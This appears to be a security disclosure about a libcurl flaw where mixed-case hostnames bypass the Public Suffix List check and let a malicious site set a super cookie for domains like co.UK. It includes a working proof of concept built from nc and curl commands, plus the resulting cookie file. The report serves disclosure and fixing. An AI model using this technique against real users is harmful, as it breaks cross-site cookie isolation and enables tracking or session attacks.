libcurl fails to normalize the hostname
and cookie_domain
parameters passed to psl_is_cookie_domain_acceptable
function. As a result a malicious site can set a super cookie if the victim requests the url with hostname with any upper case characters in the domain part of the hostname.
libpsl psl_is_cookie_domain_acceptable
documentation https://rockdaboot.github.io/libpsl/libpsl-Public-Suffix-List-functions.html#psl-is-cookie-domain-acceptable says the following:
Use helper function psl_str_to_utf8lower() for normalization of hostname and cookie_domain .
This is not done correctly and hence domains with uppercase characters will bypass the PSL check. Note that curl itself will later ignore the cookie domain capitalization and will match even lowercase hostname with the stored supercookie’s mixed case domain.
It’s also worth noting that the request Host
header will reveal the mixed case used, which will allow the attacker to prepare the correct Set-Cookie
domain for the attack.
echo -ne "HTTP/1.1 200 OK\r\nSet-Cookie: super=oops; domain=co.UK\r\nContent-Length: 0\r\n" | nc -v -l -q 1 -p 8888
curl -v -c c.txt --resolve test.co.uk:8888:testserverip http://test.co.UK:8888
nc -v -l -p 7777
curl -v -b c.txt --resolve other.co.uk:7777:testserverip http://other.co.uk:7777
Note that the super
cookie is sent to the other.com.uk
site. In fact it will be sent to any .co.uk
hosts now.
The generated cookie file:
# Netscape HTTP Cookie File
# https://curl.se/docs/http-cookies.html
# This file was generated by libcurl! Edit at your own risk.
.co.UK TRUE / FALSE 0 super oops
Bypassing supercookie protection.